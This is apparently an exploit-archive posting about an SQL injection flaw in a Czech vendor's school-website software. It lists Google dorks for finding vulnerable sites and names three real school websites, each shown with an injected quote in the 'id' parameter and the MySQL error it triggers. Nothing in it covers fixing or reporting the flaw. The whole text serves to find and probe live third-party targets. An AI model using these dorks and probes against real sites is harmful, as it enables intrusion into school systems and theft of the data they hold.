#######################################################################################
# Exploit Title : Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability
# Author : KingSkrupellos from Cyberizm Digital Security Team
# Date : 26/05/2018
# Vendor Homepages : vitalex.cz
# Exploit Risk : Medium
#######################################################################################
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
########################################################################################
# Example Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team